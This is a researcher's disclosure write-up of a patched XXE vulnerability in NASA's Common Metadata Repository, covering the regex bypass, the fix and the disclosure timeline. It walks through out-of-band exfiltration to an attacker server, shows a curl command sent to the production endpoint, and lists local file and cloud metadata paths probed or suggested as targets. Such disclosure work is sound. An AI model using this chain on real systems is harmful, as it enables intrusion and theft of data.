The Regex Said Safe. The Parser Disagreed, NASA Earth Science Platform had a Critical Vulnerability

A sanitizer understood text. A parser understood XML grammar. The gap became a CVSS 9.1 bug in NASA Earth science infrastructure.

Dewank Pant

~13 min read · May 18, 2026 (Updated: May 18, 2026) · Free: Yes

Every parser has an opinion about what input means. Every filter has a different opinion. When those two opinions diverge, the filter thinks it won and the parser keeps going. That gap is where vulnerabilities live, not in missing security controls, but in the disagreement between the ones that exist.

In early 2026, I identified a critical XML External Entity injection vulnerability in NASA's Common Metadata Repository, commonly known as CMR. CMR is one of the quiet but essential systems behind NASA Earthdata, the public gateway used by researchers, government agencies, universities, disaster response teams, and Earth observation programs to discover and access NASA's Earth science datasets. In other words, this was not a bug in a forgotten side project. It was a vulnerability in infrastructure that supports real scientific and operational work.

The affected functionality was an XML-based AQL search endpoint. The application attempted to prevent XXE by removing DOCTYPE declarations before parsing XML. The idea was straightforward: strip the dangerous XML construct before the parser sees it.

The implementation came down to this pattern:

#"<!DOCTYPE.*?>"

At first glance, that looks like it should remove a DOCTYPE declaration. But in Java regular expressions, the . metacharacter does not match newline characters by default. A single-line DOCTYPE was removed. A multi-line DOCTYPE was not!

That one difference was enough to bypass the sanitizer, reach the XML parser, and trigger external entity resolution.

From there, the vulnerability enabled server-side request forgery from NASA production infrastructure, out-of-band metadata exposure, internal service enumeration through timing and response behavior, blind file system probing, and denial-of-service impact.

The report was triaged as P1, assigned CVSS 9.1 Critical, fixed by NASA, and later publicly disclosed through Bugcrowd.

The system behind the vulnerability

NASA's Common Metadata Repository is part of the catalog infrastructure behind Earthdata, which researchers use to discover and access NASA Earth science data. That ecosystem supports climate research, disaster response, agriculture, environmental monitoring, public policy, scientific journalism, and commercial Earth observation workflows.

That context matters because a vulnerability in this kind of system is not only about one endpoint accepting malformed XML. It is about a public-facing platform that sits near data discovery workflows used by researchers, agencies, and organizations around the world.

The vulnerable path was not a new feature. It was not an authentication flow, a modern API gateway issue, or a complex business logic flaw. It was a legacy XML search interface.

Those paths are often worth reviewing because they tend to survive for compatibility reasons. They may not change often, but they remain reachable. Over time, old assumptions inside those paths can become security boundaries without anyone realizing it.

That is exactly what happened here!

The affected code path

The NASA Common Metadata Repository is open source and while understanding the functionality, I traced the AQL parsing call path in search-app/src/cmr/search/services/aql/conversion.clj and identified that user-supplied XML was passed through a sanitization function before being handed to the XML parser. Reviewing that sanitization function directly in common-lib/src/cmr/common/xml.clj is where the flaw became apparent. The regex pattern looked correct at a glance. Understanding why it was not required understanding of how Java regex handles newlines, and recognizing that the parser would not share the regex's blind spot.

The vulnerable functionality accepted XML input for an AQL search request. No authentication was required. The endpoint was publicly accessible.

POST /search/concepts/search
Content-Type: application/xml

The sanitization function removed XML processing instructions and DOCTYPE declarations using regular expressions. The relevant Clojure helper function looked like this:

(defn remove-xml-processing-instructions
  [xml]
  (let [processing-regex #"<\?.*?\?>"
        doctype-regex #"<!DOCTYPE.*?>"]
    (-> xml
        (string/replace processing-regex "")
        (string/replace doctype-regex ""))))

The intent was clear: remove XML processing instructions, remove DOCTYPE, and then parse the remaining XML. Looks safe, right….right???

The problem was that the security boundary depended on whether the regex could recognize every dangerous form of DOCTYPE.

It could not!

The root cause

The vulnerable pattern was:

doctype-regex #"<!DOCTYPE.*?>"

In Java regex, . does not match newline characters unless dotall mode is enabled. That means the pattern can match a DOCTYPE declaration when it appears on one line, such as:

<!DOCTYPE root [ ... ]>

But it does not match the same declaration when it is split across lines, such as:

<!DOCTYPE
root [ ... ]>

The sanitizer and the XML parser disagreed about the same input. The sanitizer failed to recognize it as a complete DOCTYPE, while the XML parser accepted it as valid XML grammar.

That mismatch created the bypass.

Once the multi-line DOCTYPE reached the parser, external entity definitions could be processed. At that point, the attacker was no longer just influencing XML structure. The attacker could cause the server to resolve external resources.

That turns XXE into SSRF. In a cloud environment, that can quickly become serious.

Why regex-based XML sanitization failed

XML is not a simple string format. It has grammar, declarations, entities, parameter entities, DTDs, external references, encodings, and parser-specific behavior. A regex may catch one representation of a dangerous construct while missing another representation that the parser still accepts.

The vulnerable logic attempted to remove dangerous XML before parsing. But the parser was still configured in a way that allowed external entity processing if a declaration survived the filter.

That is the core issue.

The application tried to make XML safe by rewriting the input string. A safer model is to harden the parser itself so dangerous XML features cannot execute even if they reach the parser.

In this case, the missed case was only a newline.

Attack flow

The exploit chain had three main stages:

Bypass the XML sanitizer.
Reach the XML parser with a valid DOCTYPE.
Use external entity resolution to make the server interact with resources it should not touch.

The AQL endpoint accepted XML at POST /search/concepts/search with Content-Type: application/xml. No authentication was required.

The bypass worked because the regex #"<!DOCTYPE.*?>" cannot cross newline boundaries. The closing > of a DOCTYPE block that spans multiple lines is never reached by the pattern. The parser, however, accepted the full block as valid XML grammar.

The production payload that confirmed the bypass:

Production Payload Fetching Extenal DTD

The DOCTYPE keyword opens on one line, the ]> closes it on a later line. The regex cannot span that gap. The parser does not care about the gap at all.

The external DTD served from the attacker-controlled server contained the entity chain that drove data exfiltration:

External DTD with the Actual Attack and Exfiltration

The server made two sequential outbound requests for every exfiltration test: first to fetch the DTD, then to deliver the file content as a URL parameter to the callback endpoint.

The production curl that triggered this:

curl -v -H "Content-Type: application/xml" \
  --data-binary @malicious-aql.xml \
  https://cmr.earthdata.nasa.gov/search/concepts/search

The simplified flow was:

Send XML to the public AQL search endpoint.
Use a multi-line DOCTYPE to bypass regex-based sanitization.
Define an external parameter entity referencing an attacker-controlled DTD.
Cause the XML parser to fetch the external DTD during parsing.
Observe the outbound callback from NASA production infrastructure.
Use the DTD to define a second entity that reads a local resource and delivers its contents as a URL parameter to a callback endpoint.
Measure callbacks, response codes, and timing to validate impact.

This is why XXE bugs are often more serious than they first appear. The original input is just XML, but once external entity resolution is enabled, the parser becomes a network-capable component that makes requests from inside the target environment.

That is what turns XXE into SSRF.

Why the external DTD mattered

The external DTD was the mechanism that made full out-of-band data exfiltration possible.

XML parsers typically restrict parameter entity expansion inside internal DTD subsets. But when the parser fetches an external DTD, those restrictions do not apply in the same way. Parameter entities defined in an external DTD can reference files, read their contents, and embed those contents into a second outbound request, all during a single XML parse operation.

The pattern works in two steps. The first entity reads a local resource. The second entity constructs a URL containing the content of the first entity as a query parameter, then causes the parser to fetch that URL. The attacker sees the file content arrive as a request to a server they control.

For file:///etc/hostname, the server made this request to the callback endpoint:

GET /hostname?data=[internal-ec2-hostname].ec2.internal HTTP/1.1
Host: [attacker-server]

For the ECS metadata endpoint at http://169.254.170.2/v2/metadata, the same mechanism delivered the full container metadata JSON as a URL parameter.

This technique is called out-of-band XXE because the sensitive data does not appear in the HTTP response from the vulnerable application. It appears in a separate inbound request to the attacker's server. That makes it effective even when the vulnerable endpoint returns no useful output in its normal response body.

Confirmed impact

I kept testing within the boundaries of NASA's Vulnerability Disclosure Program. The goal was to demonstrate severity clearly without turning validation into uncontrolled exploitation.

Within those limits, I confirmed multiple impact paths across five test cases, all against the production endpoint unless noted.

1. Server-side request forgery from production

The first confirmed impact was SSRF.

After the multi-line DOCTYPE bypassed sanitization, the parser fetched the external DTD from an attacker-controlled server. That confirmed that cmr.earthdata.nasa.gov was initiating outbound HTTP connections based on attacker-supplied XML input.

The callback server received:

GET /test.dtd HTTP/1.1
Host: [attacker-server]

from a NASA production IP address. The request was not from a browser or a test client. It was from the CMR application server itself, mid-parse.

SSRF matters because the attacker does not need direct network access to internal infrastructure. They can influence a trusted server to make requests on their behalf, from its own network position, with its own outbound access rights.

2. Out-of-band environment and cloud metadata exposure

Using the external DTD mechanism, data was exfiltrated out-of-band from the production environment across five separate tests. All of the following was extracted from cmr.earthdata.nasa.gov in production.

Internal hostname (file:///etc/hostname):

GET /hostname?data=[internal-hostname].ec2.internal

Kernel version (file:///proc/sys/kernel/osrelease):

GET /os?data=5.10.24xxxxxxx-xxxxxxxx-xxxxxxxx

The kernel version identified the host as Amazon Linux 2.

Second internal hostname (file:///proc/sys/kernel/hostname):

GET /kernel-host?data=[second-internal-hostname].ec2.internal

ECS container metadata (http://169.254.170.2/v2/metadata):

{
  "Cluster": "arn:aws:ecs:us-east-1:[account-id]:cluster/cmr-service-prod",
  "TaskARN": "arn:aws:ecs:us-east-1:[account-id]:task/cmr-service-prod/[task-id]",
  "Family": "search-prod",
  "Revision": "377",
  "DesiredStatus": "RUNNING",
  "KnownStatus": "RUNNING",
  "Containers": [{
    "DockerId": "[container-id]",
    "Name": "app",
    "Image": "[account-id].dkr.ecr.us-east-1.amazonaws.com/xxxxxxxxxx-xxxx-xxxxxxx",
    "Networks": [{
      "NetworkMode": "awsvpc",
      "IPv4Addresses": ["[internal-ip]"]
    }],
    "AvailabilityZone": "us-east-1b"
  }]
}

That single response exposed the AWS account ID, ECS cluster name and ARN, task ARN, container ID, ECR image URI with build tag, internal IP address, and availability zone, all from a public XML endpoint requiring no authentication.

Container resource statistics (http://169.254.170.2/v2/stats):

{
  "cpu_stats": {
    "cpu_usage": {
      "total_usage": 16343630449797,
      "percpu_usage": [8066247746107, 8281152982395],
      "usage_in_kernelmode": 551100000000,
      "usage_in_usermode": 15757270000000,
      "online_cpus": 2
    }
  },
  "memory_stats": {
    "usage": 1281866547,
    "max_usage": 1282063974,
    "stats": {
      "cache": 17301504,
      "hierarchical_memory_limit": 13958643712,
      "rss": 1276959129
    }
  }
}

Some people underestimate metadata exposure because it does not look like a password. That is the wrong way to think about it.

Infrastructure metadata tells an attacker exactly where they are. The account ID anchors further IAM enumeration. The cluster and task ARNs map the ECS topology. The ECR image URI reveals the build pipeline naming convention and container version. The internal IP anchors network reconnaissance. The availability zone narrows the deployment footprint.

Cloud attacks are built in stages. First, the attacker proves a primitive. Then they map the environment. Metadata is what turns a blind outbound callback into a usable map.

3. Internal service enumeration

The SSRF primitive also allowed internal service enumeration through HTTP response code differentials, confirmed on a local instance running the identical open-source codebase to avoid unauthorized production reconnaissance.

The CMR application returned different status codes depending on whether an internal service was reachable. Port 3001, where the Metadata DB service runs, returned HTTP 200 when targeted. Port 9999, which was closed, returned HTTP 500. The difference was consistent and repeatable.

Beyond response codes, connection behavior provided a timing oracle with the following measured characteristics:

Open port:          1-5 seconds    (connection succeeded)
Closed port:        10-20 seconds  (connection refused immediately)
Filtered/timeout:   75+ seconds    (java.net.ConnectException, Duration: 75036ms)

The 75-second timeout was observed directly in CMR logs. An attacker probing the internal network could distinguish open, closed, and firewalled hosts using timing alone, without ever seeing a response body.

Before an attacker can exploit an internal service, they need to know it exists. This oracle provides that.

4. Blind file system probing

The XXE primitive also enabled blind file system probing, confirmed against the production endpoint.

Targeting file:///etc/passwd returned HTTP 200 and resolved in approximately 20ms. Targeting file:///etc/nonexistent-file-12345 returned HTTP 500. The behavioral difference was consistent enough to treat as a reliable oracle.

On production, file:///etc/hostname and file:///proc/sys/kernel/osrelease were confirmed readable, with their contents exfiltrated out-of-band as shown in the metadata section above.

An attacker using this oracle could enumerate sensitive paths including /proc/self/environ, credential files, SSH keys, and application configuration, without those files ever appearing in an HTTP response, the contents of which could then be exfiltrated leveraging the previous technique.

5. Denial-of-service behavior

External entity resolution also introduced denial-of-service risk, demonstrated on a local instance to avoid impacting production availability.

CMR logs showed that connection attempts to unreachable hosts caused a 75-second timeout per entity reference, confirmed by the logged exception:

java.net.ConnectException: Operation timed out
Duration: 75036ms

A payload referencing three external entities targeting unreachable hosts:

Total request time exceeded 225 seconds. Worker threads remained blocked for the full duration of each timeout. A small number of concurrent requests using this pattern could exhaust the thread pool and degrade availability for legitimate users.

An XML parser that can fetch external resources is not just parsing input. It is performing attacker-influenced I/O. That can affect confidentiality through data exposure and availability through resource exhaustion simultaneously.

Why the severity was critical

The final rating was CVSS 9.1 Critical with vector CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:L.

That rating was justified because the vulnerability combined the following confirmed properties:

Publicly reachable endpoint
No authentication required
User-controlled XML input reaching the parser
Bypassable DOCTYPE sanitization
External entity processing enabled after bypass
Confirmed SSRF from production infrastructure
Confirmed out-of-band data exfiltration from production
AWS account and ECS metadata exposed
Internal service enumeration via response code oracle
Blind file system probing via response differential
Denial-of-service via timeout multiplication

The exploit path did not depend on guessing credentials, winning a race condition, or requiring special user interaction. The vulnerable behavior was reachable through crafted XML input sent to a public endpoint.

What I did not do

Responsible validation is different from uncontrolled exploitation.

I did not attempt to retrieve AWS IAM credentials via the EC2 metadata service at 169.254.169.254. I did not attempt to pivot deeper into NASA's environment using the confirmed metadata. I did not modify data, access scientific datasets, or attempt persistence. I did not test beyond what was necessary to prove impact at each stage.

The confirmed primitives were already sufficient to establish critical severity. The metadata exfiltration demonstrated that the vulnerability was real and the impact was material. Further exploitation was unnecessary and would have crossed the line from validation into intrusion.

The fix

The narrow fix is a single character change in one file.

Vulnerable
(def doctype-regex #"<!DOCTYPE.*?>")

Fixed
(def doctype-regex #"(?s)<!DOCTYPE.*?>")

The (?s) flag enables DOTALL mode in Java regex, causing . to match newline characters. A multi-line DOCTYPE is no longer invisible to the pattern.

But that is not the fix I would rely on as the primary defense.

The correct fix is at the parser level. In search-app/src/cmr/search/services/aql/conversion.clj at line 367, the call to clojure.data.xml/parse-str should be replaced with the secure SAX parser already present in the CMR codebase:

Vulnerable
xml-struct (xml/parse-str (cx/remove-xml-processing-instructions aql))

Fixed
xml-struct (xml/parse-str-sax-no-xxe (cx/remove-xml-processing-instructions aql))

That disables external entity processing at the parser level regardless of what the input looks like. The regex can still run as defense-in-depth. But the parser should never have been in a state where bypassing a regex was sufficient to reach external entity resolution.

The secure SAX parser was already present in the CMR codebase. The fix was applying it to the AQL parsing path. The defensive posture should be:

Disable DOCTYPE declarations at the parser level.
Disable external general entities.
Disable external parameter entities.
Disable external DTD loading.
Disable network access during XML parsing.
Treat string sanitization as defense-in-depth, not as the primary control.

A regex should not be the thing standing between the open internet and a parser that can make network requests.

Remediation timeline

I reported the vulnerability through NASA's Vulnerability Disclosure Program on Bugcrowd on February 2, 2026. Bugcrowd validated the SSRF callback the same day and moved the submission to triaged on February 5. NASA confirmed and accepted the finding. I provided reproduction steps and the out-of-band exfiltration proof of concept on February 5. The submission was marked resolved on March 3, 2026. NASA issued a formal Letter of Recognition from the SAISO on March 11, 2026. The public disclosure was published to Bugcrowd CrowdStream on March 17, 2026.

The fix was merged to the public NASA Common Metadata Repository via pull request #2378.

The full public disclosure is available on Bugcrowd CrowdStream.

The process worked the way coordinated vulnerability disclosure is supposed to work: report, validation, remediation, resolution, and public disclosure after the issue was fixed.

Why this bug matters

The important part of this vulnerability is not just that XXE still exists. Security engineers already know that unsafe XML parsing is dangerous.

The more interesting lesson is that the application appeared to have a protection in place. There was a sanitization function. There was an attempt to remove DOCTYPE. There was visible security intent.

But the control was implemented at the wrong layer.

The application tried to secure XML by rewriting the input string before parsing it. The regex understood text. The XML parser understood XML grammar. Those two interpretations were not equivalent, and the gap between them became the vulnerability.

This pattern shows up in many places beyond XML. Any time an application tries to secure a structured language by rewriting strings before handing the result to a real parser, there is a chance that the filter and the parser will disagree. That disagreement is where bypasses live.

For XML specifically, the safest approach is not to guess every dangerous representation of DOCTYPE. The safer approach is to configure the parser so external entity resolution is not available in the first place.

In this case, one regular expression looked like a protection.

One newline proved it was not enough!

#xxe #ssrf #security #information-security #nasa

< Go to the original